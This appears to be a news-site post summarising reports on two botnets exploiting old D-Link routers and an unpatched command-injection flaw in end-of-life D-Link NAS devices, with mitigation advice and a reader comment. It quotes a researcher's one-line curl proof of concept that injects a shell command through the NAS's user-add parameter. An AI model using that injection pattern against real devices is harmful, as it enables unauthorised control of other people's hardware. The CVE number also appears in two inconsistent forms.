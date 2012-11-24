from the that-didn't-take-long dept.
Malware botnets exploit outdated D-Link routers in recent attacks:
Two botnets tracked as 'Ficora' and 'Capsaicin' have recorded increased activity in targeting D-Link routers that have reached end of life or are running outdated firmware versions.
The list of targets includes popular D-Link devices used by individuals and organizations such as DIR-645, DIR-806, GO-RT-AC750, and DIR-845L.
For initial access, the two pieces of malware use known exploits for CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.
Once a device is compromised, attackers leverage weaknesses in in D-Link's management interface (HNAP) and execute malicious commands through a GetDeviceSettings action.
The botnets can steal data and execute shell scripts. Attackers appear to compromise the devices for distributed denial-of-service (DDoS) purposes.
Ficora has a widespread geographic distribution with some focus on Japan and the United States. Capsaicin appears to be targeting mostly devices in East Asian countries and increased its activity for just two days, starting on October 21.
[...] One way to prevent botnet malware infections on routers and IoT devices is to ensure that they're running the latest firmware version, which should addresses known vulnerabilities.
If the device has reached end-of-life and no longer receives security updates, it should be replaced with a new model.
A a general advice, you should replace default admin credentials with unique and strong passwords and disable remote access interfaces if not needed.
Previously: D-Link Won't Fix Critical Flaw Affecting 60,000 Older NAS Devices
Related Stories
BleepingComputer is reporting that D-Link will not fix security issues associated with CVE 2024-10194 on up to 60,000 of its older NAS devices.
From the article:
More than 60,000 D-Link network-attached storage devices that have reached end-of-life are vulnerable to a command injection vulnerability with a publicly available exploit.
The flaw, tracked as CVE-2024-10914, has a critical 9.2 severity score and is present in the 'cgi_user_add' command where the name parameter is insufficiently sanitized.
An unauthenticated attacker could exploit it to inject arbitrary shell commands by sending specially crafted HTTP GET requests to the devices.
The flaw impacts multiple models of D-Link network-attached storage (NAS) devices that are commonly used by small businesses:
- DNS-320 Version 1.00
- DNS-320LW Version 1.01.0914.2012
- DNS-325 Version 1.01, Version 1.02
- DNS-340L Version 1.08
In a technical write-up that provides exploit details, security researcher Netsecfish says that leveraging the vulnerability requires sending "a crafted HTTP GET request to the NAS device with malicious input in the name parameter."
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
"This curl request constructs a URL that triggers the cgi_user_add command with a name parameter that includes an injected shell command," the researcher explains.
[...]
In a security bulletin today, D-Link has confirmed that a fix for CVE-2024-10914 is not coming and the vendor recommends that users retire vulnerable products.
If that is not possible at the moment, users should at least isolate them from the public internet or place them under stricter access conditions.
Is this the appropriate way for D-Link to handle this? When told that a previously discovered (the existence of which has previously been disclosed to them) vulnerability will be made public, notify the world that the affected devices are "end-of-life" and "end-of-service"?
Do any Soylentils have one of the affected devices? (If so, please place your bank/credit/loan account details on those devices and provide us with IP addresses. Thanks!)
(Score: 2) by drussell on Monday December 30, @08:54PM
Even better, if the device is capable of running it and there is an easily available image, install something like OpenWrt [openwrt.org] on it.